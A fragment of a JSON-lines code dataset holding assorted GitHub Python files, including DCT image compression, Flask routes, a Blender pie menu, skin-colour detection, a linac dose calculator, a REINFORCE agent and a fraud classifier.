M):\r\n\t\t# print(\"i : \"+str(i)+\" j : \"+str(j))\r\n\t\tblock_size = img_gray[i:i+N,j:j+M].shape\r\n\t\tblock[0:block_size[0],0:block_size[1]] = img_gray[i:i+N,j:j+M]\r\n\t\tblock = dct2(block)\r\n\t\tdctblock[i:i+N,j:j+M] = block[0:block_size[0],0:block_size[1]]/quant[0:block_size[0],0:block_size[1]]\r\n\r\n#image compr\r\nplt.figure(3)\r\nplt.imshow(np.log(1.0+dctblock),cmap='gray')\r\n\r\n#idct + iquant\r\nnewim=np.zeros(img_size)\r\nfor i in range(0,img_size[0], N):\r\n\tfor j in range(0,img_size[1], M):\r\n\t\t# print(\"i : \"+str(i)+\" j : \"+str(j))\r\n\t\tblock_size = dctblock[i:i+N,j:j+M].shape\r\n\t\tblock[0:block_size[0],0:block_size[1]] = dctblock[i:i+N,j:j+M]*quant[0:block_size[0],0:block_size[1]]\r\n\t\tblock = idct2(block)\r\n\t\tnewim[i:i+N,j:j+M] = block[0:block_size[0],0:block_size[1]]\r\n\r\n\r\n#psnr et ssim\r\npsnr=measure.compare_psnr(img_gray,newim,1.0)\r\nssim=measure.compare_ssim(img_gray,newim)\r\nprint(\"psnr : \"+str(psnr)+\" ssim : \"+str(ssim))\r\n\r\nplt.figure(4)\r\nnewim=np.ubyte(np.round(255.0*newim,0))\r\nplt.imshow(newim,cmap='gray')\r\n\r\nfich=open('madct.dat','wb')\r\nfich.write(np.reshape(newim,-1)) \r\nfich.close()\r\n\r\npsnr_tab = np.zeros(30)\r\nssim_tab = np.zeros(30)\r\nabs_tab = np.zeros(30)\r\ncompt=0\r\n\r\nfor qual in range(10,160,5):\r\n\r\n\tmonIm=pil.Image.fromarray(np.ubyte(np.round(255.0*img_gray,0)))\r\n\tmonIm.save('essai.jpeg',quality=qual)\r\n\r\n\timg_compr = io.imread(\"essai.jpeg\")\r\n\timg_compr = rgb2gray(img_compr)\r\n\timg_compr=sk.img_as_float(img_compr)\r\n\tpsnr_tab[compt]=measure.compare_psnr(img_gray,img_compr,1.0)\r\n\tssim_tab[compt]=measure.compare_ssim(img_gray,img_compr)\r\n\tabs_tab[compt] = qual\r\n\tcompt+=1\r\n\r\nplt.figure(5)\r\nplt.plot(abs_tab, psnr_tab)\r\nplt.figure(6)\r\nplt.plot(abs_tab, ssim_tab)\r\nprint( \"taille= \",os.path.getsize(\"essai.jpeg\"), \"en octet\")\r\nprint(\"compression =\", 1.0*img_size[0]*img_size[1]/os.path.getsize(\"essai.jpeg\"))\r\nplt.show()","repo_name":"JoffreyFerreira/TMA-DCT","sub_path":"TP_Python/Exemple_dct2.py","file_name":"Exemple_dct2.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24861793578","text":"__author__ = 'Erik Rosales'\n\nfrom flask import Flask, render_template\nfrom flask_pymongo import PyMongo\n\napp = 
Flask(__name__)\napp.config['MONGO_URI'] = \"mongodb://localhost:27017/watchDb\"\n\n@app.route('/')\ndef index():\n return render_template('watch.html')\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"erikfuego/WatchApp","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1376920916","text":"import numpy as np\r\nimport csv\r\n\r\nwith open(\"articles.csv\") as d:\r\n reader=csv.reader(d)\r\n data=list(reader)\r\n articles=data[1:]\r\n\r\narticles.sort_values(by=\"total_events\", ascending=False)\r\n\r\noutput=list(articles[[\"url\", \"title\", \"text\", \"lang\", \"total_events\"]].head(20))","repo_name":"LakshyaDaBestCoder/ArticleRecommendation_Unfinal","sub_path":"demographic_filtering.py","file_name":"demographic_filtering.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11364686390","text":"from flask import Blueprint, jsonify, session, request\nfrom app.models import User, db, Reaction\nfrom flask_login import current_user, login_required\n\nreaction_routes = Blueprint('reactions', __name__)\n\n\n# Get All Reaction\n@reaction_routes.route('/', methods=['GET'])\ndef getAllReactions():\n reactions = Reaction.query.all()\n\n reactions_info = []\n\n for each in reactions:\n reactions_info.append({\n 'id': each.id,\n 'content': each.content,\n 'user_id': each.user_id,\n 'message_id': each.message_id\n })\n\n return {'reactions': reactions_info}\n\n\n# Get Details of a Reaction from an Id\n@reaction_routes.route('/<int:id>', methods=['GET'])\ndef reactionDetails(id):\n reaction_Details = Reaction.query.get(id)\n if reaction_Details is None:\n return {'errors': [\"Reaction couldn't be found\"]}, 404\n\n ret = {\n 'id': reaction_Details.id,\n 'content': reaction_Details.content,\n 'user_id': reaction_Details.user_id,\n 'message_id': reaction_Details.message_id\n }\n\n return ret\n\n\n#using websocket instead\n# Create a New Reaction\n@reaction_routes.route('/<int:id>/new', methods=['POST'])\n# @login_required\ndef createReaction(id):\n current_user_id = current_user.get_id()\n new_content = request.json['content']\n\n new = Reaction(\n content=new_content,\n user_id=current_user_id,\n message_id=id\n )\n db.session.add(new)\n db.session.commit()\n return new.to_dict()\n\n\n\n# Edit a Reaction\n@reaction_routes.route('/<int:id>', methods=['PUT'])\n# @login_required\ndef editReaction(id):\n\n reaction_edit = Reaction.query.get(id)\n\n #error response:\n if reaction_edit is None:\n return {'message': [\"Reaction couldn\\'t be found\"]}, 404\n new_content = request.json['content']\n reaction_edit.content=new_content\n\n db.session.commit()\n return reaction_edit.to_dict()\n\n\n# Delete a Reaction\n@reaction_routes.route('/<int:id>', methods=[\"DELETE\"])\n# @login_required\ndef deleteReaction(id):\n reaction_Delete = Reaction.query.get(id)\n if reaction_Delete is None:\n return {'errors': [\"Reaction couldn't be found\"]}, 404\n db.session.delete(reaction_Delete)\n db.session.commit()\n return {'message': \"Successfully deleted\"}, 200\n","repo_name":"matt7xu/gamerCord","sub_path":"app/api/reaction_routes.py","file_name":"reaction_routes.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21145281599","text":"import bpy\r\nimport 
math\r\n\r\nfrom bpy.types import Menu\r\n\r\nclass SCREEN_pie(Menu):\r\n # label is displayed at the center of the pie menu.\r\n bl_label = \"Screen UI Layout\"\r\n \r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n pie = layout.menu_pie()\r\n idx=bpy.data.window_managers['WinMan'].screen_pie_index\r\n # operator_enum will just spread all available options\r\n # for the type enum of the operator on the pie\r\n if len(bpy.data.screens)>8:\r\n tot=math.ceil((len(bpy.data.screens)-7)/6)\r\n if idx==0:\r\n op=pie.operator(\"screen_pie.change\", text=bpy.data.screens[0].name)\r\n op.name=bpy.data.screens[0].name\r\n pie.operator(\"screen_pie.next_caller\", text='', icon='FORWARD')\r\n for n in range(1, 7):\r\n op=pie.operator(\"screen_pie.change\", text=bpy.data.screens[n].name)\r\n op.name=bpy.data.screens[n].name\r\n else:\r\n if idx!=tot:\r\n min=6*idx\r\n max=min+6\r\n pie.operator(\"screen_pie.previous_caller\", text='', icon='BACK')\r\n pie.operator(\"screen_pie.next_caller\", text='', icon='FORWARD')\r\n elif idx==tot:\r\n min=7*idx\r\n max=min+7\r\n pie.operator(\"screen_pie.previous_caller\", text='', icon='BACK')\r\n for n in range(min, max):\r\n try:\r\n op=pie.operator(\"screen_pie.change\", text=bpy.data.screens[n].name)\r\n op.name=bpy.data.screens[n].name\r\n except IndexError:\r\n pass\r\n else:\r\n for screen in bpy.data.screens:\r\n op=pie.operator(\"screen_pie.change\", text=screen.name)\r\n op.name=screen.name\r\n \r\nclass SCREEN_PIE_caller(bpy.types.Operator):\r\n bl_idname = \"screen_pie.caller\"\r\n bl_label = \"Screen UI Pie Menu\"\r\n bl_description = \"\"\r\n bl_options = {\"REGISTER\"}\r\n\r\n \r\n\r\n def execute(self, context):\r\n bpy.data.window_managers['WinMan'].screen_pie_index=0\r\n bpy.ops.wm.call_menu_pie(name=\"SCREEN_pie\")\r\n return {\"FINISHED\"}\r\n \r\nclass SCREEN_PIE_next_caller(bpy.types.Operator):\r\n bl_idname = \"screen_pie.next_caller\"\r\n bl_label = \"\"\r\n bl_description = \"Go to next Screen UI Pie menu\"\r\n bl_options = {\"REGISTER\"}\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n idx=bpy.data.window_managers['WinMan'].screen_pie_index\r\n tot=math.ceil((len(bpy.data.screens)-7)/6)\r\n return idx>=0 and idx<=tot\r\n\r\n def execute(self, context):\r\n bpy.data.window_managers['WinMan'].screen_pie_index+=1\r\n bpy.ops.wm.call_menu_pie(name=\"SCREEN_pie\")\r\n return {\"FINISHED\"}\r\n \r\nclass SCREEN_PIE_previous_caller(bpy.types.Operator):\r\n bl_idname = \"screen_pie.previous_caller\"\r\n bl_label = \"\"\r\n bl_description = \"Go to previous Screen UI Pie menu\"\r\n bl_options = {\"REGISTER\"}\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n idx=bpy.data.window_managers['WinMan'].screen_pie_index\r\n return idx>0 \r\n\r\n def execute(self, context):\r\n bpy.data.window_managers['WinMan'].screen_pie_index-=1\r\n bpy.ops.wm.call_menu_pie(name=\"SCREEN_pie\")\r\n return {\"FINISHED\"}","repo_name":"samytichadou/Screen-Pie-Blender-Addon","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"17586979274","text":"# -*- coding:utf-8 -*-\nimport cv2\nimport numpy as np\n\n\ndef ellipse_detect(image):\n \"\"\"YCrCb颜色空间的椭圆肤色分割\"\"\"\n # image = cv2.imread(image, cv2.IMREAD_COLOR)\n skinCrCbHist = np.zeros((256, 256), dtype=np.uint8)\n cv2.ellipse(skinCrCbHist, (113, 155), (23, 15),\n 43, 0, 360, (255, 255, 255), -1)\n YCRCB = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = 
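Note on the Blender pie-menu paging in the gui.py record above: page 0 shows seven screens (indices 0-6), middle pages start at min = 6*idx (so page 1 re-shows index 6), and the final page starts at min = 7*idx, which only lines up when there is exactly one extra page and drifts otherwise. A small illustrative helper (not from the add-on) showing one consistent slicing rule, where page 0 holds 7 entries and later pages hold 6:

# Illustrative paging: page 0 shows 7 screens, later pages 6 each,
# so page idx >= 1 starts at offset 7 + 6*(idx - 1).
def page_bounds(idx, total):
    """Return the [start, end) slice of screen indices for pie page idx."""
    if idx == 0:
        return 0, min(7, total)
    start = 7 + 6 * (idx - 1)
    return start, min(start + 6, total)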
cv2.split(YCRCB)\n mask = np.zeros(cr.shape, dtype=np.uint8)\n (x, y) = cr.shape\n for i in range(0, x):\n for j in range(0, y):\n CR = YCRCB[i, j, 1]\n CB = YCRCB[i, j, 2]\n if skinCrCbHist[CR, CB] > 0:\n mask[i, j] = 255\n return mask\n\n\ndef cr_otsu(image):\n \"\"\"YCrCb颜色空间的Cr分量+Otsu阈值分割\"\"\"\n ycrcb = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(ycrcb)\n cr = cv2.GaussianBlur(cr, (5, 5), 0)\n cv2.imshow(\"cr\", cr)\n gry = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cr1 = cv2.GaussianBlur(gry, (5, 5), 0)\n _, mask = cv2.threshold(cr1, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n return mask\n\n\ndef crcb_range_sceening(image):\n \"\"\"YCrCb颜色空间的CrCb分量阈值分割\"\"\"\n ycrcb = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(ycrcb)\n mask = np.zeros(cr.shape, dtype=np.uint8)\n (x, y) = cr.shape\n for i in range(0, x):\n for j in range(0, y):\n if (cr[i][j] > 140) and (cr[i][j]) < 175 and (cb[i][j] > 100) and (cb[i][j]) < 120:\n mask[i][j] = 255\n else:\n mask[i][j] = 0\n return mask\n\n\ndef hsv_detect(image):\n \"\"\"HSV颜色空间的阈值分割\"\"\"\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n (_h, _s, _v) = cv2.split(hsv)\n mask = np.zeros(_h.shape, dtype=np.uint8)\n (x, y) = _h.shape\n for i in range(0, x):\n for j in range(0, y):\n if (_h[i][j] > 7) and (_h[i][j] < 20) and (_s[i][j] > 28) and (_s[i][j] < 255) and (_v[i][j] > 50) and (\n _v[i][j] < 255):\n mask[i][j] = 255\n else:\n mask[i][j] = 0\n\n return mask\n\n\nimg = cv2.imread('567.jpg')\n# 圖片前處理\nimage = cv2.resize(img, (256, 256), interpolation=cv2.INTER_CUBIC)\n\nif __name__ == \"__main__\":\n \n # cv2.imshow(\"1\", ellipse_detect(image))\n cv2.imshow(\"2\", cr_otsu(image))\n # cv2.imshow(\"3\", crcb_range_sceening(image))\n # cv2.imshow(\"4\", hsv_detect(image))\n cv2.waitKey(0)\n","repo_name":"sklonely/python","sub_path":"腳辨識/skin_detector.py","file_name":"skin_detector.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73006784805","text":"# -*- coding: utf-8 -*-\n# Author: Francois Tadel\n# License GNU GPL v3\n\nimport sys, os, json\nfrom collections import OrderedDict\n\nfrom locateElectrodes import LocateElectrodes\nfrom brainvisa import axon\nfrom soma.qt_gui.qt_backend import QtGui, QtCore, uic\n\n\ndef main(inFile, outFolder):\n \n # Read input file\n f = open(inFile, 'r')\n lines = f.readlines()\n f.close()\n # Create dictionnary\n plot_dict_MNI = OrderedDict()\n for iLine in range(len(lines)):\n # Skip header line\n if (iLine == 0):\n continue\n # Get contact name and positions\n contactInfo = lines[iLine].split()\n # Separate electrode name / contact index (find last letter)\n origName = list(contactInfo[0])\n iLastLetter = None\n for i in reversed(list(range(len(origName)))):\n if not origName[i].isdigit():\n iLastLetter = i\n break\n if iLastLetter is None:\n continue\n # Upper case for all the letters except from \"p\" that stand for ' (prime)\n for i in range(iLastLetter+1):\n if (i == 0) or (origName[i] != 'p'):\n origName[i] = origName[i].upper()\n elif (i > 0) and (origName[i] == 'p'):\n origName[i] = \"'\"\n # Format CSV contact name\n cleanName = ''.join(origName[:iLastLetter+1]) + \"%02d\" % int(''.join(origName[iLastLetter+1:]))\n # Add contact to the list\n plot_dict_MNI[cleanName] = [float(contactInfo[1]), float(contactInfo[2]), float(contactInfo[3])]\n\n # Sort contact names\n plot_dict_MNI = OrderedDict(sorted(plot_dict_MNI.items()))\n \n # Get input base name\n 
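Note on the skin_detector.py record above: each detector walks the image with nested Python loops, which is interpreter-level O(H*W) work per call. The same CrCb range test vectorizes directly with NumPy boolean indexing; a sketch for crcb_range_sceening, with the thresholds copied from the record:

# Vectorized equivalent of crcb_range_sceening's per-pixel loop.
import cv2
import numpy as np

def crcb_range_screening_fast(image):
    ycrcb = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)
    _, cr, cb = cv2.split(ycrcb)
    mask = np.zeros(cr.shape, dtype=np.uint8)
    keep = (cr > 140) & (cr < 175) & (cb > 100) & (cb < 120)
    mask[keep] = 255
    return mask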
fPath, fName = os.path.split(inFile)\n baseName, fExt = os.path.splitext(fName)\n # Create output filenames\n fileEleclabel = os.path.join(outFolder, baseName + \".eleclabel\")\n fileCsv = os.path.join(outFolder, baseName + \".csv\") \n \n # Start BrainVISA\n app = QtGui.QApplication(sys.argv)\n axon.initializeProcesses()\n w = LocateElectrodes()\n\n # Call export functions from locateElectrodes\n w.exportParcels2(True, True, plot_dict_MNI, None, fileEleclabel)\n w.exportCSVdictionaries(False, fileEleclabel, None, fileCsv, plot_dict_MNI)\n\n\n# Calling from command line\nif __name__ == \"__main__\":\n # Test input parameters\n if (len(sys.argv) < 3) or not os.path.exists(sys.argv[1]) or not os.path.exists(sys.argv[2]):\n print(\"USAGE: convert_mni2mcs.py input_mni.txt output_dir\")\n sys.exit(2)\n main(sys.argv[1], sys.argv[2])\n \n ","repo_name":"IntrAnatSEEGSoftware/IntrAnat","sub_path":"convert_mni2csv_old.py","file_name":"convert_mni2csv_old.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"18527618474","text":"from os import system\nimport platform\n\n\n#clean consule function\ndef clean ():\n clean = platform.system().lower()\n if 'windows' in clean:\n system('cls')\n else:\n system('clear')\n\ndef v1andMU (MU, v1):\n v1andMU = v1/MU\n return v1andMU\n\ndef KTP (p, T):\n KTP = ((273.2+T)*p0)/((273.2+T0)*p)\n return KTP\n\ndef Kpol (M1, M2):\n Kpol = ((M1)+(M2))/(2*M1)\n return Kpol\n\ndef Ks (v1, v2):\n Ks = 1.198+(-0.8753)*(v1/v2)+0.6773*(v1/v2)**2\n return Ks\n\ndef Dzref (M1, ndw, kQ):\n Dzref = M1*Kpol(M1, M2)*Ks(v1,v2)*KTP(p,T)*ndw*kQ\n return Dzref\ndef Dzmax (PDD):\n Dzmax =( 100 * (Dzref (M1, ndw, kQ)/PDD))*100\n return Dzmax\n\ndef main():\n hasilRatio = v1andMU(MU, v1)\n print(f\"Ratio of dosimeter reading and monitor unit: {hasilRatio} nC/MU\")\n hasilKTP = KTP (p, T)\n print(f\"Temperature and presure correction: {hasilKTP}\")\n hasilKpol = Kpol (M1, M2)\n print(f\"Polarization correction: {hasilKpol}\")\n hasilKs = Ks (v1, v2)\n print(f\"Saturation correction: {hasilKs}\")\n hasilDzref = Dzref (M1, ndw, kQ)\n print(f\"Dose at Z ref: {hasilDzref} Gy/MU\")\n hasilDzmax = Dzmax (PDD)\n print(f\"Dose at Z Max: {hasilDzmax} cGy/MU\")\n\n#variabel needed\nMU = None; p=None; T=None; T0=20; p0=101.3; M1= None; M2=None;\nv1=None; v2=None; ndw=None; kQ=None; PDD=None\n\n# MU\nwhile MU is None:\n value = input('MU value: ')\n try:\n MU = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n print(20*'=')\n continue\n# v1\nwhile v1 is None:\n value = input('v1 value: ')\n try:\n v1 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# v2\nwhile v2 is None:\n value = input('v2 value: ')\n try:\n v2 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# M1\nwhile M1 is None:\n value = input('M1 value: ')\n try:\n M1 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# M2\nwhile M2 is None:\n value = input('M2 value: ')\n try:\n M2 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# p\nwhile p is None:\n value = input('p value: ')\n try:\n p = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# T\nwhile T is None:\n value = input('T value: ')\n try:\n T = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# PDD\nwhile PDD is None:\n value = input('PDD value: 
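Note on the convert_mni2csv_old.py record above: the reversed scan finds the last non-digit character to split an electrode label like "ap12" into a name part and a contact number, upper-casing letters except an interior "p", which is read as a prime mark. The same normalization can be expressed with a regex; a sketch whose behavior is inferred from the record:

# Regex sketch of the contact-name normalization in the record.
import re

def clean_contact_name(raw):
    m = re.match(r"(.*?)(\d+)$", raw)  # non-greedy prefix + trailing digits
    if m is None:
        return None
    name, idx = m.groups()
    # First character upper-cased; any later 'p' becomes a prime mark.
    norm = "".join("'" if (i > 0 and c == "p") else c.upper()
                   for i, c in enumerate(name))
    return "%s%02d" % (norm, int(idx))  # e.g. "ap12" -> "A'12"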
')\n try:\n PDD = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# KQ\nwhile kQ is None:\n value = input('kQ value: ')\n try:\n kQ = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# ndw\nwhile ndw is None:\n value = input('ndw value: ')\n try:\n ndw = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n \n# Main program loop\nwhile True:\n clean()\n main()\n while True:\n answer = str(input('\\nLagi? (y/n): '))\n if answer in ('y', 'n'):\n break\n print(\"Cek Kembali Input\")\n if answer == 'y':\n clean()\n continue\n else:\n print(\"Dadah\")\n break\n\n\n\n","repo_name":"Stheven-Chen/Linac-High-Energy-Photon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70520672165","text":"import gym\ngym.logger.set_level(40) # suppress warnings (please remove if gives error)\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n\n\nimport torch\ntorch.manual_seed(0) # set random seed\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.distributions import Categorical\n\nimport Policy\nfrom Policy import Policy\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\npolicy = Policy().to(device)\noptimizer = optim.Adam(policy.parameters(), lr=1e-2)\n\ndef main(env, n_episodes=1000, max_t=1000, gamma=1.0, print_every=100):\n\n scores_deque = deque(maxlen=100)\n scores = []\n for i_episode in range(1, n_episodes+1):\n saved_log_probs = []\n rewards = []\n state = env.reset()\n for t in range(max_t):\n action, log_prob = policy.act(state)\n saved_log_probs.append(log_prob)\n state, reward, done, _ = env.step(action)\n rewards.append(reward)\n if done:\n break\n scores_deque.append(sum(rewards))\n scores.append(sum(rewards))\n\n discounts = [gamma**i for i in range(len(rewards)+1)]\n R = sum([a*b for a,b in zip(discounts, rewards)])\n\n policy_loss = []\n for log_prob in saved_log_probs:\n policy_loss.append(-log_prob * R)\n policy_loss = torch.cat(policy_loss).sum()\n\n optimizer.zero_grad()\n policy_loss.backward()\n optimizer.step()\n\n\n if i_episode % print_every == 0:\n print('Episode {}\\tAverage Score: {:.2f} \\tCheckpoint Saved!'.format(i_episode, np.mean(scores_deque)))\n torch.save(policy.state_dict(), 'checkpoint.pth')\n if np.mean(scores_deque)>=195.0:\n print('Environment solved in {:d} episodes!\\tAverage Score: {:.2f} \\tCheckpoint Saved!'.format(i_episode-100, np.mean(scores_deque)))\n torch.save(policy.state_dict(), 'checkpoint.pth')\n break\n\n return scores\n\nif __name__ == \"__main__\":\n env = gym.make('CartPole-v0')\n env.seed(0)\n print('observation space:', env.observation_space)\n print('action space:', env.action_space)\n scores = main(env)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(np.arange(1, len(scores)+1), scores)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n plt.show()\n","repo_name":"jiruifu-jerry0219/DRLND_Jerry","sub_path":"Reinforce/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73543125284","text":"import numpy as np\nimport pandas as pd\nimport pickle\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom 
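Note on the REINFORCE record (Agent.py) above: it scales every log-probability in an episode by the same whole-episode return R, the classic high-variance form, and its discounts list has len(rewards)+1 entries, one of which zip silently drops. A common lower-variance variant weights each step by its reward-to-go; a sketch consistent with the record's variable names:

# Reward-to-go variant: weight log pi(a_t|s_t) by the return from step t onward.
returns = []
G = 0.0
for r in reversed(rewards):
    G = r + gamma * G
    returns.append(G)
returns.reverse()

policy_loss = torch.cat(
    [-log_prob * G for log_prob, G in zip(saved_log_probs, returns)]
).sum()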
src.utils import expected_profit\n\n\nclass FraudModel():\n\n def __init__(self, cb):\n self.cost_benefit_matrix = cb\n\n def fit(self, X, y):\n # create and fit model\n self.clf_ = GradientBoostingClassifier(learning_rate=.1,\n n_estimators=700,\n max_depth=5,\n random_state=313)\n self.clf_.fit(X, y)\n return self\n\n def predict_profit(self, X_test, y_test):\n preds = self.clf_.predict(X_test)\n cm = confusion_matrix(y_test, preds).ravel()\n return expected_profit(self.cost_benefit_matrix, cm)\n\n def to_pickle(self):\n pickle.dump(self, open(\"static/model.pkl\", \"wb\"))\n\nif __name__ == '__main__':\n # CLI test series\n\n # load pickled DF\n fm = pd.read_pickle('static/fm.pkl')\n\n # split X and y\n y = fm.fraud.values\n X = fm.drop(['fraud'], axis=1).values\n\n # define cost-benefit for test\n cb = np.array([[2190, -10],\n [-2200, -.25]])\n\n # fit and pickle the model\n model = FraudModel(cb).fit(X, y)\n model.to_pickle()\n\n test_model = pickle.load(open('static/model.pkl', 'rb'))\n\n print(test_model)\n","repo_name":"fyrk/case-study-fraud-prediction","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72287018406","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUnit tests for the tf2_msgs strategies.\n\"\"\"\n\nfrom hypothesis import given\nfrom hypothesis.strategies import just\n\nfrom hypothesis_ros.messages.tf2_msgs import tfmessage\nfrom hypothesis_ros.messages.geometry_msgs import (\n transform,\n transform_stamped,\n vector3,\n quaternion\n)\nfrom hypothesis_ros.messages.std_msgs import header\nfrom hypothesis_ros.message_fields import (\n array,\n float64,\n uint32,\n time,\n)\n\n\n@given(array(elements=transform_stamped(\n header(seq=uint32(min_value=0, max_value=0),\n stamp=time(\n secs=uint32(min_value=1, max_value=1),\n nsecs=uint32(min_value=2, max_value=2)\n ),\n frame_id=just('some_tf_frame_name')\n ),\n just('some_child_frame_id'),\n transform(\n translation=vector3(\n x=float64(min_value=1.0, max_value=1.0),\n y=float64(min_value=2.0, max_value=2.0),\n z=float64(min_value=3.0, max_value=3.0)\n ),\n rotation=quaternion(\n x=float64(min_value=1.0, max_value=1.0),\n y=float64(min_value=2.0, max_value=2.0),\n z=float64(min_value=3.0, max_value=3.0),\n w=float64(min_value=4.0, max_value=4.0)\n )\n )\n ), min_size=2, max_size=2\n )\n)\ndef test_tfmessage_accepts_customized_strategies(generated_value):\n \"\"\"Exemplary customized TFMessage.\"\"\"\n assert generated_value == [((0, (1, 2), 'some_tf_frame_name'),\n 'some_child_frame_id',\n ((1.0, 2.0, 3.0), (1.0, 2.0, 3.0, 4.0))),\n ((0, (1, 2), 'some_tf_frame_name'),\n 'some_child_frame_id',\n ((1.0, 2.0, 3.0), (1.0, 2.0, 3.0, 4.0)))]\n","repo_name":"fkromer/hypothesis-ros","sub_path":"tests/messages/test_tf2_msgs.py","file_name":"test_tf2_msgs.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"42392518197","text":"# -*- coding: utf-8 -*-\n'''\nNord VPN API (unofficial)\n=========================\nUnofficial nordvpn api\n'''\n\nVERSION = \"0.0.1\"\n\nfrom setuptools import setup, find_packages\n\nsetup(\n name='nordvpn',\n description='Unofficial nordvpn api',\n long_description='\\n'.join(\n [\n open('README.md', 'rb').read().decode('utf-8')\n ]\n ),\n author='Sang Han',\n license='Apache License 2.0',\n url='https://github.com/jjangsangy/nordvpn',\n 
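Note on the FraudModel record above: expected_profit is imported from src.utils but that module is not included in the record. Given that predict_profit passes confusion_matrix(...).ravel() (which yields tn, fp, fn, tp) together with a 2x2 cost-benefit matrix, one plausible sketch, offered purely as an assumption and not the project's actual code, is a per-observation expected value:

# Hypothetical sketch of expected_profit; the real src.utils is not in the record.
# cm is (tn, fp, fn, tp) from confusion_matrix(...).ravel();
# cb is a 2x2 cost-benefit matrix laid out to match that order.
import numpy as np

def expected_profit(cb, cm):
    cm = np.asarray(cm, dtype=float)
    return float((np.asarray(cb).ravel() * cm).sum() / cm.sum())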
author_email='jjangsangy@gmail.com',\n include_package_data=True,\n packages=find_packages(),\n version=VERSION,\n install_requires=['requests', 'chardet', 'pandas'],\n platforms='any',\n zip_safe=True,\n entry_points={\n 'console_scripts': [\n 'nord = nordvpn.__main__:main'\n ]\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Unix Shell',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities',\n ],\n)\n","repo_name":"jjangsangy/nordvpn","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"24356514914","text":"\"\"\"\nVincente Pericoli\nUC Davis\n\nfor more info, including license information,\nsee: https://github.com/ucdavis-kanvinde-group/abaqus-odb-tools\n\n\nSet of functions to use with ABAQUS output databases (ODB files).\n\nThese functions rely on the abaqus-odb-tools library (see above).\nThey exist purely for backward-compatibility, since that library\nwas totally refactored into an object-oriented code.\n\nSimply download abaqus-odb-tools, and change the sys.path.append\ndirectory (below) to point towards the download.\n\"\"\"\n\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Import Modules\n\n\nfrom odbAccess import *\nfrom abaqusConstants import *\nimport numpy\nimport sys\nsys.path.append(\"C:\\\\Users\\\\Vince Pericoli\\\\Documents\\\\GitHub\\\\abaqus-odb-tools\")\nfrom odbFieldVariableClasses import *\n\n#\n# 